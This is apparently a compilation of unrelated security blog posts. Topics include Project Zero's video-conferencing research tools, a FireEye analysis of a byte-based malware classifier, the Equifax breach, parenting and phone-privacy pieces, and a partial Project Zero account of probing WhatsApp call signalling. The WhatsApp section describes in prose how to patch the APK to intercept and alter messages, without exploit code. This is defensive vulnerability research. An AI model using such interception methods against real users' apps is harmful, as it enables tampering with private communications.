Several mobile applications we looked at had unnecessary attack surface. Specifically codecs and other features of the video conferencing implementation were enabled and accessible via RTP even though no legitimate call would ever use them. WebRTC and PJSIP support disabling specific features such as codecs and FEC. It is a good idea to disable the features that are not being used.

Finally, video conferencing vulnerabilities can generally be split into those that require the target to answer the incoming call, and those that do not. Vulnerabilities that do not require the call to be answered are more dangerous. We observed that some video conferencing applications perform much more parsing of untrusted data before a call is answered than others. We recommend that developers put as much functionality after the call is answered as possible.


In order to open up the most popular video conferencing implementations to more security research, we are releasing the tools we developed to do this research. Street Party is a suite of tools that allows the RTP streams of video conferencing implementations to be viewed and modified. It includes:

  • WebRTC: instructions for recording and replaying RTP packets using WebRTC’s existing tools
  • FaceTime: hooks for recording and replaying FaceTime calls
  • WhatsApp: hooks for recording and replaying WhatsApp calls on Android

We hope these tools encourage even more investigation into the security properties of video conferencing. Contributions are welcome.


We reviewed WebRTC, FaceTime and WhatsApp and found 11 serious vulnerabilities in their video conferencing implementations. Accessing and altering their encrypted content streams required substantial tooling. We are releasing this tooling to enable additional security research on these targets. There are many properties of video conferencing that make it susceptible to vulnerabilities. Adequate testing, conservative design and frequent patching can reduce the security risk of video conferencing implementations.

What are Deep Neural Networks Learning About Malware?

An increasing number of modern antivirus solutions rely on machine learning (ML) techniques to protect users from malware. While ML-based approaches, like FireEye Endpoint Security’s MalwareGuard capability, have done a great job at detecting new threats, they also come with substantial development costs. Creating and curating a large set of useful features takes significant amounts of time and expertise from malware analysts and data scientists (note that in this context a feature refers to a property or characteristic of the executable that can be used to distinguish between goodware and malware). In recent years, however, deep learning approaches have shown impressive results in automatically learning feature representations for complex problem domains, like images, speech, and text. Can we take advantage of these advances in deep learning to automatically learn how to detect malware without costly feature engineering?

As it turns out, deep learning architectures, and in particular convolutional neural networks (CNNs), can do a good job of detecting malware simply by looking at the raw bytes of Windows Portable Executable (PE) files. Over the last two years, FireEye has been experimenting with deep learning architectures for malware classification, as well as methods to evade them. Our experiments have demonstrated surprising levels of accuracy that are competitive with traditional ML-based solutions, while avoiding the costs of manual feature engineering. Since the initial presentation of our findings, other researchers have published similarly impressive results, with accuracy upwards of 96%.

Since these deep learning models are only looking at the raw bytes without any additional structural, semantic, or syntactic context, how can they possibly be learning what separates goodware from malware? In this blog post, we answer this question by analyzing FireEye’s deep learning-based malware classifier.


  • FireEye’s deep learning classifier can successfully identify malware using only the unstructured bytes of the Windows PE file.
  • Import-based features, like names and function call fingerprints, play a significant role in the features learned across all levels of the classifier.
  • Unlike other deep learning application areas, where low-level features tend to generally capture properties across all classes, many of our low-level features focused on very specific sequences primarily found in malware.
  • End-to-end analysis of the classifier identified important features that closely mirror those created through manual feature engineering, which demonstrates the importance of classifier depth in capturing meaningful features.


Before we dive into our analysis, let’s first discuss what a CNN classifier is doing with Windows PE file bytes. Figure 1 shows the high-level operations performed by the classifier while “learning” from the raw executable data. We start with the raw byte representation of the executable, absent any structure that might exist (1). This raw byte sequence is embedded into a high-dimensional space where each byte is replaced with an n-dimensional vector of values (2). This embedding step allows the CNN to learn relationships among the discrete bytes by moving them within the n-dimensional embedding space. For example, if the bytes 0xe0 and 0xe2 are used interchangeably, then the CNN can move those two bytes closer together in the embedding space so that the cost of replacing one with the other is small. Next, we perform convolutions over the embedded byte sequence (3). As we do this across our entire training set, our convolutional filters begin to learn the characteristics of certain sequences that differentiate goodware from malware (4). In simpler terms, we slide a fixed-length window across the embedded byte sequence and the convolutional filters learn the important features from across those windows. Once we have scanned the entire sequence, we can then pool the convolutional activations to select the best features from each section of the sequence (i.e., those that maximally activated the filters) to pass along to the next level (5). In practice, the convolution and pooling operations are used repeatedly in a hierarchical fashion to aggregate many low-level features into a smaller number of high-level features that are more useful for classification. Finally, we use the aggregated features from our pooling as input to a fully-connected neural network, which classifies the PE file sample as either goodware or malware (6).

Figure 1: High-level overview of a convolutional neural network applied to raw bytes from a Windows PE files.

The specific deep learning architecture that we analyze here actually has five convolutional and max pooling layers arranged in a hierarchical fashion, which allows it to learn complex features by combining those discovered at lower levels of the hierarchy. To efficiently train such a deep neural network, we must restrict our input sequences to a fixed length – truncating any bytes beyond this length or using special padding symbols to fill out smaller files. For this analysis, we chose an input length of 100KB, though we have experimented with lengths upwards of 1MB. We trained our CNN model on more than 15 million Windows PE files, 80% of which were goodware and the remainder malware. When evaluated against a test set of nearly 9 million PE files observed in the wild from June to August 2018, the classifier achieves an accuracy of 95.1% and an F1 score of 0.96, which are on the higher end of scores reported by previous work.

In order to figure out what this classifier has learned about malware, we will examine each component of the architecture in turn. At each step, we use either a sample of 4,000 PE files taken from our training data to examine broad trends, or a smaller set of six artifacts from the NotPetya, WannaCry, and BadRabbit ransomware families to examine specific features.

Bytes in (Embedding) Space

The embedding space can encode interesting relationships that the classifier has learned about the individual bytes and determine whether certain bytes are treated differently than others because of their implied importance to the classifier’s decision. To tease out these relationships, we will use two tools: (1) a dimensionality reduction technique called multi-dimensional scaling (MDS) and (2) a density-based clustering method called HDBSCAN. The dimensionality reduction technique allows us to move from the high-dimensional embedding space to an approximation in two-dimensional space that we can easily visualize, while still retaining the overall structure and organization of the points. Meanwhile, the clustering technique allows us to identify dense groups of points, as well as outliers that have no nearby points. The underlying intuition being that outliers are treated as “special” by the model since there are no other points that can easily replace them without a significant change in upstream calculations, while dense clusters of points can be used interchangeably.

Figure 2: Visualization of the byte embedding space using multi-dimensional scaling (MDS) and clustered with hierarchical density-based clustering (HDBSCAN) with clusters (Left) and outliers labeled (Right).

On the left side of Figure 2, we show the two-dimensional representation of our byte embedding space with each of the clusters labeled, along with an outlier cluster labeled as -1. As you can see, the vast majority of bytes fall into one large catch-all class (Cluster 3), while the remaining three clusters have just two bytes each. Though there are no obvious semantic relationships in these clusters, the bytes that were included are interesting in their own right – for instance, Cluster 0 includes our special padding byte that is only used when files are smaller than the fixed-length cutoff, and Cluster 1 includes the ASCII character ‘r.’

What is more fascinating, however, is the set of outliers that the clustering produced, which are shown in the right side of Figure 3.  Here, there are a number of intriguing trends that start to appear. For one, each of the bytes in the range 0x0 to 0x6 are present, and these bytes are often used in short forward jumps or when registers are used as instruction arguments (e.g., eax, ebx, etc.). Interestingly, 0x7 and 0x8 are grouped together in Cluster 2, which may indicate that they are used interchangeably in our training data even though 0x7 could also be interpreted as a register argument. Another clear trend is the presence of several ASCII characters in the set of outliers, including ‘\n’, ‘A’, ‘e’, ‘s’, and ‘t.’ Finally, we see several opcodes present, including the call instruction (0xe8), loop and loopne (0xe0, 0xe2), and a breakpoint instruction (0xcc).

Given these findings, we immediately get a sense of what the classifier might be looking for in low-level features: ASCII text and usage of specific types of instructions.

Deciphering Low-Level Features

The next step in our analysis is to examine the low-level features learned by the first layer of convolutional filters. In our architecture, we used 96 convolutional filters at this layer, each of which learns basic building-block features that will be combined across the succeeding layers to derive useful high-level features. When one of these filters sees a byte pattern that it has learned in the current convolution, it will produce a large activation value and we can use that value as a method for identifying the most interesting bytes for each filter. Of course, since we are examining the raw byte sequences, this will merely tell us which file offsets to look at, and we still need to bridge the gap between the raw byte interpretation of the data and something that a human can understand. To do so, we parse the file using PEFile and apply BinaryNinja’s disassembler to executable sections to make it easier to identify common patterns among the learned features for each filter.

Since there are a large number of filters to examine, we can narrow our search by getting a broad sense of which filters have the strongest activations across our sample of 4,000 Windows PE files and where in those files those activations occur. In Figure 3, we show the locations of the 100 strongest activations across our 4,000-sample dataset. This shows a couple of interesting trends, some of which could be expected and others that are perhaps more surprising. For one, the majority of the activations at this level in our architecture occur in the ‘.text’ section, which typically contains executable code. When we compare the ‘.text’ section activations between malware and goodware subsets, there are significantly more activations for the malware set, meaning that even at this low level there appear to be certain filters that have keyed in on specific byte sequences primarily found in malware. Additionally, we see that the ‘UNKNOWN’ section– basically, any activation that occurs outside the valid bounds of the PE file – has many more activations in the malware group than in goodware. This makes some intuitive sense since many obfuscation and evasion techniques rely on placing data in non-standard locations (e.g., embedding PE files within one another).

Figure 3: Distribution of low-level activation locations across PE file headers and sections. Overall distribution of activations (Left), and activations for goodware/malware subsets (Right). UNKNOWN indicates an area outside the valid bounds of the file and NULL indicates an empty section name.

We can also examine the activation trends among the convolutional filters by plotting the top-100 activations for each filter across our 4,000 PE files, as shown in Figure 4. Here, we validate our intuition that some of these filters are overwhelmingly associated with features found in our malware samples. In this case, the activations for Filter 57 occur almost exclusively in the malware set, so that will be an important filter to look at later in our analysis. The other main takeaway from the distribution of filter activations is that the distribution is quite skewed, with only two filters handling the majority of activations at this level in our architecture. In fact, some filters are not activated at all on the set of 4,000 files we are analyzing.

Figure 4: Distribution of activations over each of the 96 low-level convolutional filters. Overall distribution of activations (Left), and activations for goodware/malware subsets (Right).

Now that we have identified the most interesting and active filters, we can disassemble the areas surrounding their activation locations and see if we can tease out some trends. In particular, we are going to look at Filters 83 and 57, both of which were important filters in our model based on activation value. The disassembly results for these filters across several of our ransomware artifacts is shown in Figure 5.

For Filter 83, the trend in activations becomes pretty clear when we look at the ASCII encoding of the bytes, which shows that the filter has learned to detect certain types of imports. If we look closer at the activations (denoted with a ‘*’), these always seem to include characters like ‘r’, ‘s’, ‘t’, and ‘e’, all of which were identified as outliers or found in their own unique clusters during our embedding analysis.  When we look at the disassembly of Filter 57’s activations, we see another clear pattern, where the filter activates on sequences containing multiple push instructions and a call instruction – essentially, identifying function calls with multiple parameters.

In some ways, we can look at Filters 83 and 57 as detecting two sides of the same overarching behavior, with Filter 83 detecting the imports and 57 detecting the potential use of those imports (i.e., by fingerprinting the number of parameters and usage). Due to the independent nature of convolutional filters, the relationships between the imports and their usage (e.g., which imports were used where) is lost, and that the classifier treats these as two completely independent features.

Figure 5: Example disassembly of activations for filters 83 (Left) and 57 (Right) from ransomware samples. Lines prepended with '*' contain the actual filter activations, others are provided for context.

Aside from the import-related features described above, our analysis also identified some filters that keyed in on particular byte sequences found in functions containing exploit code, such as DoublePulsar or EternalBlue. For instance, Filter 94 activated on portions of the EternalRomance exploit code from the BadRabbit artifact we analyzed. Note that these low-level filters did not necessarily detect the specific exploit activity, but instead activate on byte sequences within the surrounding code in the same function.

These results indicate that the classifier has learned some very specific byte sequences related to ASCII text and instruction usage that relate to imports, function calls, and artifacts found within exploit code. This finding is surprising because in other machine learning domains, such as images, low-level filters often learn generic, reusable features across all classes.

Bird’s Eye View of End-to-End Features

While it seems that lower layers of our CNN classifier have learned particular byte sequences, the larger question is: does the depth and complexity of our classifier (i.e., the number of layers) help us extract more meaningful features as we move up the hierarchy? To answer this question, we have to examine the end-to-end relationships between the classifier’s decision and each of the input bytes. This allows us to directly evaluate each byte (or segment thereof) in the input sequence and see whether it pushed the classifier toward a decision of malware or goodware, and by how much. To accomplish this type of end-to-end analysis, we leverage the SHapley Additive exPlanations (SHAP) framework developed by Lundberg and Lee. In particular, we use the GradientSHAP method that combines a number of techniques to precisely identify the contributions of each input byte, with positive SHAP values indicating areas that can be considered to be malicious features and negative values for benign features.

After applying the GradientSHAP method to our ransomware dataset, we noticed that many of the most important end-to-end features were not directly related to the types of specific byte sequences that we discovered at lower layers of the classifier. Instead, many of the end-to-end features that we discovered mapped closely to features developed from manual feature engineering in our traditional ML models. As an example, the end-to-end analysis on our ransomware samples identified several malicious features in the checksum portion of the PE header, which is commonly used as a feature in traditional ML models. Other notable end-to-end features included the presence or absence of certain directory information related to certificates used to sign the PE files, anomalies in the section table that define the properties of the various sections of the PE file, and specific imports that are often used by malware (e.g., GetProcAddress and VirtualAlloc).

In Figure 6, we show the distribution of SHAP values across the file offsets for the worm artifact of the WannaCry ransomware family. Many of the most important malicious features found in this sample are focused in the PE header structures, including previously mentioned checksum and directory-related features. One particularly interesting observation from this sample, though, is that it contains another PE file embedded within it, and the CNN discovered two end-to-end features related to this. First, it identified an area of the section table that indicated the ‘.data’ section had a virtual size that was more than 10x larger than the stated physical size of the section. Second, it discovered maliciously-oriented imports and exports within the embedded PE file itself. Taken as a whole, these results show that the depth of our classifier appears to have helped it learn more abstract features and generalize beyond the specific byte sequences we observed in the activations at lower layers.

Figure 6: SHAP values for file offsets from the worm artifact of WannaCry. File offsets with positive values are associated with malicious end-to-end features, while offsets with negative values are associated with benign features.


In this blog post, we dove into the inner workings of FireEye’s byte-based deep learning classifier in order to understand what it, and other deep learning classifiers like it, are learning about malware from its unstructured raw bytes. Through our analysis, we have gained insight into a number of important aspects of the classifier’s operation, weaknesses, and strengths:

  • Import Features: Import-related features play a large role in classifying malware across all levels of the CNN architecture. We found evidence of ASCII-based import features in the embedding layer, low-level convolutional features, and end-to-end features.
  • Low-Level Instruction Features: Several features discovered at the lower layers of our CNN classifier focused on sequences of instructions that capture specific behaviors, such as particular types of function calls or code surrounding certain types of exploits. In many cases, these features were primarily associated with malware, which runs counter to the typical use of CNNs in other domains, such as image classification, where low-level features capture generic aspects of the data (e.g., lines and simple shapes). Additionally, many of these low-level features did not appear in the most malicious end-to-end features.
  • End-to-End Features: Perhaps the most interesting result of our analysis is that many of the most important maliciously-oriented end-to-end features closely map to common manually-derived features from traditional ML classifiers. Features like the presence or absence of certificates, obviously mangled checksums, and inconsistencies in the section table do not have clear analogs to the lower-level features we uncovered. Instead, it appears that the depth and complexity of our CNN classifier plays a key role in generalizing from specific byte sequences to meaningful and intuitive features.

It is clear that deep learning offers a promising path toward sustainable, cutting-edge malware classification. At the same time, significant improvements will be necessary to create a viable real-world solution that addresses the shortcomings discussed in this article. The most important next step will be improving the architecture to include more information about the structural, semantic, and syntactic context of the executable rather than treating it as an unstructured byte sequence. By adding this specialized domain knowledge directly into the deep learning architecture, we allow the classifier to focus on learning relevant features for each context, inferring relationships that would not be possible otherwise, and creating even more robust end-to-end features with better generalization properties.

The content of this blog post is based on research presented at the Conference on Applied Machine Learning for Information Security (CAMLIS) in Washington, DC on Oct. 12-13, 2018. Additional material, including slides and a video of the presentation, can be found on the conference website.


The previous OSSEC articles went through through the process of installing OSSEC and deploying a distributed architecture. This article will focus on configuring OSSEC to make better sense of WordPress...

Read More

The post OSSEC FOR WEBSITE SECURITY: PART III – Optimizing for WordPress appeared first on PerezBox.

How to turn off location tracking on your iPhone or iPad

Most of us already know that many apps track our location data to better deliver information about local weather, shops, or movie showtimes. A new report from The New York Times, though, reveals that this data is often frighteningly precise and collected up to 14,000 times per day. It’s so precise, in fact, that it’s possible to figure out intimate details of a person’s life merely by studying it. Worse, some apps sell this data to companies who then use it to push hyper-targeted ads to your phones.

Fortunately, the report also demonstrates that we iOS users are better protected than our Android counterparts. Even so, we’re far from immune.

To read this article in full, please click here

How To Help Your Teen Organise a Party Online Without It Becoming a Public Spectacle

Teen Parties and Instagram. If your teen is keen to have a party, I can guarantee you that they will not be handing out paper invitations on the playground! It’s all done online now my friends and that means – it can get very messy.

When my kids were in Primary School, I would make party invitations on Smilebox. It was so easy to personalise your invitation – you could, (and still can) add pics and even videos. And then best of all, you can print them out, or email them directly to your guests. Perfect!!

But, unfortunately, my teen boys won’t have a bar of Smilebox. Parties are now organised on Instagram which is definitely not as clean cut as Smilebox.

How Parties are Organised on Instagram

For those of you who aren’t familiar with the process of party organising on Instagram, let me share with you the process. But first, please sit down, it may make your hair stand on end.

  1. Create a private Instagram account that is specifically for the party eg Alex’s 21st Birthday Party. Include a small blurb about the party and encourage interested people to apply – I’m not joking!
  2. Tell a few key friends about the event and have them share the account in their Instagram story. This is to attract like-minded people who might be suitable for the party.
  3. People who are interested in attending the party then request to follow the account. The person holding the party then decides whether they would like the potential guest to attend. They check them out online and see if they are the ‘right fit’. If the potential guest’s request to follow is accepted, this means that they have an invite to the party.

Now, you can just imagine how this could play out. The fact the party account’s existence is shared by nominated friends means a teen’s entire school year and social circle quickly finds out about the party. And teens want to be included – we’ve all been there – so, of course many apply to attend the party. But unfortunately, numbers are limited so they are excluded but in the public arena that is Instagram.

I totally appreciate that you can’t have unlimited numbers to social gatherings, but life in the pre-social media era made this far easier to deal with. You may have known, for example, that your math class buddy, Rebecca, was having a party and that you weren’t invited. But you didn’t have to humiliate yourself by applying, being rejected and then having to view the fabulous images of the night, usually taken by a glossy professional photographer.

Is There Another Way?

No 4 son recently turned 15 and was super keen for a party. He and I were both determined to avoid this cruel approach to party organising. While he couldn’t have unlimited numbers and couldn’t invite everyone, our aim was to keep it as low key as possible while trying to avoid hurting kids’ feelings.

So, we went old-school! He invited guests directly. He did use Instagram but each guest received a private message. He did consider doing a group message on Instagram however there was a risk that the guests could add someone into the conversation and share the party details publicly.

And I’m pleased to report that the party went off without a hitch! I think my 2 eldest sons who were the ‘Security Team’ were a tad disappointment that there were no issues. I was very relieved!

Empathy Is Essential

As a mother of four sons, I am very aware of the importance of robust mental health. The digital world in which are kids are growing up adds a huge layer of complexity and additional pressures to daily life that didn’t exist when we were young. No longer can issues be left at school or on the bus, social media means you have no escape. And it is this constant pressure that is widely documented to be contributing to an increase in anxiety and depression amongst our teens.

It’s no secret that humans are at their most vulnerable during their teenage years. So, I strongly encourage parents of teens to help their offspring rethink their approach to organising social gatherings. Ask them to take a minute to think about how it would feel to be excluded from a party, particularly after having to gather the courage to apply to attend. I know it would have an impact on my self-worth and I’m in my 40’s!! Encourage them to find an alternative way of organising their event.

Digital Parenting Can Be a Tough Gig

Parenting ‘digital natives’ is tough. Our generation of kids have technology running through their veins while we are doing our best to stay up to date. If your teens dismisses your suggestions about party organising and keep assuring you that they have it ‘all under control’, take a deep breath. Respect for others, empathy and kindness is what you are trying to instill – and these concepts have been around for thousands of years!! So, stay strong!!

Till next time,

Alex xx


The post How To Help Your Teen Organise a Party Online Without It Becoming a Public Spectacle appeared first on McAfee Blogs.

An Avoidable Breach That Could Happen to Any Organization

Following a 14-month investigation into the Equifax breach that affected 148 million consumers around the world, a new report from a House Oversight and Government Reform Committee has concluded that the breach was entirely preventable. According to the report, Equifax “failed to fully appreciate and mitigate its cybersecurity risks” and if it had taken action, “the data breach could have been prevented.”

Hackers exploited a known web vulnerability in the Equifax website built on a Java framework called Apache Struts. It has been reported that attackers were focused on the application that allowed consumers to check their credit rating from the company website, which was a custom-built system created in the 1970s. Struts is commonly used in enterprise applications and a favorite of banks, airlines, and Fortune 1000 companies.

Although a security update to fix the vulnerability was available weeks before the attack, these are complicated to track and update without the appropriate application security testing solutions. What’s more, digital transformation within large, well-established institutions is not a simple process. Modernizing legacy systems takes considerable time, capital, and expertise.

Strengthening Security Practices is the Best Prevention

The Committee’s investigation found several factors led to the hack, including poor security practices and policies, complex and outdated IT systems, and a lack of accountability and management structure. The report notes that Equifax allowed more than 300 security certificates to expire, including 79 certificates for monitoring business critical domains. Further, its failure to renew an expired digital certificate for 19 months left the company without visibility into the theft of the data during the time of the attack.

According to TechCrunch’s Zack Whittaker, the attackers were able to maintain access to the site for more than two months. They were able to move through a number of systems to obtain an unencrypted file of passwords on one server, which gave them access to more than 48 databases that contained unencrypted consumer credit data. Hackers sent more than 9,000 queries on the database and downloaded data on 265 different occasions.

Open Source Risk Is Not a Problem Without a Solution – But You Need the Right Solution

When the Equifax hack was originally announced, Veracode’s Mark Curphey conducted an analysis on the existing code for Apache Struts, uncovering the fact that it was using 11 vulnerable libraries which had 43 security advisories reported against them. One of the libraries contained a high-risk remote execution vulnerability where the vulnerable part was being called. At the time, however, information about this issue (CVE-2017-7525) was marked as Reserved in the National Vulnerability Database – meaning it was not publicly or widely available. Yet SourceClear, acquired by Veracode, had a complete technical write-up available to its users.

This is a perfect example of why simple tools that only look at the source code are not sufficient for open source security testing. The library that was in question was only added to Struts at build-time, and therefore never would have been seen by tools monitoring code repositories like GitHub.

Breaches resulting from hackers having their way with vulnerable open source code is the new normal. Despite this trend, the data in Veracode’s State of Software Security Volume 9 released in October does not suggest that open source libraries and components – or the way that they are used – are becoming any more secure.  Last year, our scan data showed that roughly 88 percent of Java applications contained a component with at least one vulnerability and this year, that figured dipped down only marginally to 87.5 percent.

The truth is, vulnerabilities in open source components are highly likely to be exploited, and issues arise because attackers know that a single vulnerability can be found in a wide range of applications. No one is responsible for ensuring security fixes get disclosed – and disclosed directly to organizations using them – leaving it up to each security and development team to stay up-to-date on what needs patching, and making sure that the work is completed. Without implementing a modern Software Composition Analysis solution, maintaining an inventory of what components are in use, where they’re in use, and if they’re configured in such a way that’s easily exploitable is a major challenge.

To learn more about the technical attributes that sets Veracode apart from the competition, and how we can help solve your organization’s open source risk, download our whitepaper:

Android security audit: An easy-to-follow annual checklist

Android security is always a hot topic on these here Nets of Inter — and almost always for the wrong reason.

As we've discussed ad nauseam over the years, most of the missives you read about this-or-that super-scary malware/virus/brain-eating-boogie-monster are overly sensationalized accounts tied to theoretical threats with practically zero chance of actually affecting you in the real world. If you look closely, in fact, you'll start to notice that the vast majority of those stories stem from companies that — gasp! — make their money selling malware protection programs for Android phones. (Pure coincidence, right?)

To read this article in full, please click here

Adventures in Video Conferencing Part 4: What Didn’t Work Out with WhatsApp

Posted by Natalie Silvanovich, Project Zero

Not every attempt to find bugs is successful. When looking at WhatsApp, we spent a lot of time reviewing call signalling hoping to find a remote, interaction-less vulnerability. No such bugs were found. We are sharing our work with the hopes of saving other researchers the time it took to go down this very long road. Or maybe it will give others ideas for vulnerabilities we didn’t find.

As discussed in Part 1, signalling is the process through which video conferencing peers initiate a call. Usually, at least part of signalling occurs before the receiving peer answers the call. This means that if there is a vulnerability in the code that processes incoming signals before the call is answered, it does not require any user interaction.

WhatsApp implements signalling using a series of WhatsApp messages. Opening in IDA, there are several native calls that handle incoming signalling messages.


Using apktool to extract the WhatsApp APK, it appears these natives are called from a loop in the com.whatsapp.voipcalling.Voip class. Looking at the smali, it looks like signalling messages are sent as WhatsApp messages via the WhatsApp server, and this loop handles the incoming messages.

Immediately, I noticed that there was a peer-to-peer encrypted portion of the message (the rest of the message is only encrypted peer-to-server). I thought this had the highest potential of reaching bugs, as the server would not be able to sanitize the data. In order to be able to read and alter encrypted packets, I set up a remote server with a python script that opens a socket. Whenever this socket receives data, the data is displayed on the screen, and I have the option of either sending the unaltered packet or altering the packet before it is sent. I then looked for the point in the WhatsApp smali where messages are peer-to-peer encrypted.

Since WhatsApp uses libsignal for peer-to-peer encryption, I was able to find where messages are encrypted by matching log entries. I then added smali code that sends a packet with the bytes of the message to the server I set up, and then replaces it with the bytes the server returns (changing the size of the byte array if necessary). This allowed me to view and alter the peer-to-peer encrypted message. Making a call using this modified APK, I discovered that the peer-to-peer message was always exactly 24 bytes long, and appeared to be random. I suspected that this was the encryption key used by the call, and confirmed this by looking at the smali.

A single encryption key doesn’t have a lot of potential for malformed data to lead to bugs (I tried lengthening and shortening it to be safe, but got nothing but unexploitable null pointer issues), so I moved on to looking at the peer-to-server encrypted messages. Looking at the Voip loop in smali, it looked like the general flow is that the device receives an incoming message, it is deserialized and if it is of the right type, it is forwarded to the messaging loop. Then certain properties are read from the message, and it is forwarded to a processing function based on its type. Then the processing function reads even more properties, and calls one of the above native methods with the properties as its parameters. Most of these functions have more than 20 parameters.

Many of these functions perform logging when they are called, so by making a test call, I could figure out which functions get called before a call is picked up. It turns out that during a normal incoming call, the device only receives an offer and calls Java_com_whatsapp_voipcalling_Voip_nativeHandleCallOffer, and then spawns the incoming call screen in WhatsApp. All the other signal types are not used until the call is picked up.

An immediate question I had was whether other signal types are processed if they are received before a call is picked up. Just because the initiating device never sends these signal types before the call is picked up doesn’t mean the receiving device wouldn’t process them if it received them.

Looking through the APK smali, I found the class com.whatsapp.voipcalling.VoiceService$DefaultSignalingCallback that has several methods like sendOffer and sendAccept that appeared to send the messages that are processed by these native calls. I changed sendOffer to call other send methods, like sendAccept instead of its normal messaging functionality. Trying this, I discovered that the Voip loop will process any signal type regardless of whether the call has been answered. The native methods will then parse the parameters, process them and put the results in a buffer, and then call a single method to process the buffer. It is only at that point processing will stop if the message is of the wrong type.
I then reviewed all of the above methods in IDA. The code was very conservatively written, and most needed checks were performed. However, there were a few areas that potentially had bugs that I wanted to investigate more. I decided that changing the parameters to calls in the com.whatsapp.voipcalling.VoiceService$DefaultSignalingCallback was too slow to test the number of cases I wanted to test, and went looking for another way to alter the messages.

Ideally, I wanted a way to pass peer-to-server encrypted messages to my server before they were sent, so I could view and alter them. I went through the WhatsApp APK smali looking for a point after serialization but before encryption where I could add my smali function that sends and alters the packets. This was fairly difficult and time consuming, and I eventually put my smali in every method that wrote to a non-file ByteArrayOutputStream in the com.whatsapp.protocol and com.whatsapp.messaging packages (about 10 total) and looked for where it got called. I figured out where it got called, and fixed the class so that anywhere a byte array was written out from a stream, it got sent to my server, and removed the other calls. (If you’re following along at home, the smali file I changed included the string “Double byte dictionary token out of range”, and the two methods I changed contained calls to toByteArray, and ended with invoking a protocol interface.) Looking at what got sent to my server, it seemed like a reasonably comprehensive collection of WhatsApp messages, and the signalling messages contained what I thought they would.

WhatsApp messages are in a compressed XMPP format. A lot of parsers have been written for reverse engineering this protocol, but I found the whatsapp-reveng parser worked the best. I did have to replace the tokens in with a list extracted from the APK for it to work correctly though. This made it easier to figure out what was in each packet sent to the server.

Playing with this a bit, I discovered that there are three types of checks in WhatsApp signalling messages. First, the server validates and modifies incoming signalling messages. Secondly, the messages are deserialized, and this can cause errors if the format is incorrect, and generally limits the contents of the Java message object that is passed on. Finally, the native methods perform checks on their parameters.

These additional checks prevented several of the areas I thought were problems from actually being problems. For example, there is a function called by Java_com_whatsapp_voipcalling_Voip_nativeHandleCallOffer that takes in an array of byte arrays, an array of integers and an array of booleans. It uses these values to construct candidates for the call. It checks that the array of byte arrays and the array of integers are of the same length before it loops through them, using values from each, but it does not perform the same check on the boolean array. I thought that this could go out of bounds, but it turns out that the integer and booleans are serialized as a vector of <int,bool> pairs, and the arrays are then copied from the vector, so it is not actually possible to send arrays with different lengths.

One area of the signalling messages that looked especially concerning was the voip_options field of the message. This field is never sent from the sending device, but is added to the message by the server before it is forwarded to the receiving device. It is a buffer in JSON format that is processed by the receiving device and contains dozens of configuration parameters.

{"aec":{"offset":"0","mode":"2","echo_detector_mode":"4","echo_detector_impl":"2","ec_threshold":"50","ec_off_threshold":"40","disable_agc":"1","algorithm":{"use_audio_packet_rate":"1","delay_based_bwe_trendline_filter_enabled":"1","delay_based_bwe_bitrate_estimator_enabled":"1","bwe_impl":"5"},"aecm_adapt_step_size":"2"},"agc":{"mode":"0","limiterenable":"1","compressiongain":"9","targetlevel":"1"},"bwe":{"use_audio_packet_rate":"1","delay_based_bwe_trendline_filter_enabled":"1","delay_based_bwe_bitrate_estimator_enabled":"1","bwe_impl":"5"},"encode":{"complexity":"5","cbr":"0"},"init_bwe":{"use_local_probing_rx_bitrate":"1","test_flags":"982188032","max_tx_rott_based_bitrate":"128000","max_bytes":"8000","max_bitrate":"350000"},"ns":{"mode":"1"},"options":{"connecting_tone_desc": "test","video_codec_priority":"2","transport_stats_p2p_threshold":"0.5","spam_call_threshold_seconds":"55","mtu_size":"1200","media_pipeline_setup_wait_threshold_in_msec":"1500","low_battery_notify_threshold":"5","ip_config":"1","enc_fps_over_capture_fps_threshold":"1","enable_ssrc_demux":"1","enable_preaccept_received_update":"1","enable_periodical_aud_rr_processing":"1","enable_new_transport_stats":"1","enable_group_call":"1","enable_camera_abtest_texture_preview":"1","enable_audio_video_switch":"1","caller_end_call_threshold":"1500","call_start_delay":"1200","audio_encode_offload":"1","android_call_connected_toast":"1"}
Sample voip_options (truncated)

If a peer could send a voip_options parameter to another peer, it would open up a lot of attack surface, including a JSON parser and the processing of these parameters. Since this parameter almost always appears in an offer, I tried modifying an offer to contain one, but the offer was rejected by the WhatsApp server with error 403. Looking at the binary, there were three other signal types in the incoming call flow that could accept a voip_options parameter. Java_com_whatsapp_voipcalling_Voip_nativeHandleCallOfferAccept and Java_com_whatsapp_voipcalling_Voip_nativeHandleCallVideoChanged were accepted by the server if a voip_options parameter was included, but it was stripped before the message was sent to the peer. However, if a voip_options parameter was attached to a Java_com_whatsapp_voipcalling_Voip_nativeHandleCallGroupInfo message, it would be forwarded to the peer device. I confirmed this by sending malformed JSON looking at the log of the receiving device for an error.

The voip_options parameter is processed by WhatsApp in three stages. First, the JSON is parsed into a tree. Then the tree is transformed to a map, so JSON object properties can be looked up efficiently even though there are dozens of them. Finally, WhatsApp goes through the map, looking for specific parameters and processes them, usually copying them to an area in memory where they will set a value relevant to the call being made.

Starting off with the JSON parser, it was clearly the PJSIP JSON parser. I compiled the code and fuzzed it, and only found one minor out-of-bounds read issue.

I then looked at the conversion of the JSON tree output from the parser into the map. The map is a very efficient structure. It is a hash map that uses FarmHash as its hashing algorithm, and it is designed so that the entire map is stored in a single slab of memory, even if the JSON objects are deeply nested. I looked at many open source projects that contained similar structures, but could not find one that looked similar. I looked through the creation of this structure in great detail, looking especially for type confusion bugs as well as errors when the memory slab is expanded, but did not find any issues.

I also looked at the functions that go through the map and handle specific parameters. These functions are extremely long, and I suspect they are generated using a code generation tool such as bison. They mostly copy parameters into static areas of memory, at which point they become difficult to trace. I did not find any bugs in this area either. Other than going through parameter names and looking for value that seemed likely to cause problems, I did not do any analysis of how the values fetched from JSON are actually used. One parameter that seemed especially promising was an A/B test parameter called setup_video_stream_before_accept. I hoped that setting this would allow the device to accept RTP before the call is answered, which would make RTP bugs interaction-less, but I was unable to get this to work.

In the process of looking at this code, it became difficult to verify its functionality without the ability to debug it. Since WhatsApp ships an x86 library for Android, I wondered if it would be possible to run the JSON parser on Linux.

Tavis Ormandy created a tool that can load the library on Linux and run native functions, so long as they do not have a dependency on the JVM. It works by patching the .dynamic ELF section to remove unnecessary dependencies by replacing DT_NEEDED tags with DT_DEBUG tags. We also needed to remove constructors and deconstructors by changing the DT_FINI_ARRAYSZ and DT_INIT_ARRAYSZ to zero. With these changs in place, we could load the library using dlopen() and use dlsym() and dlclose() as normal.

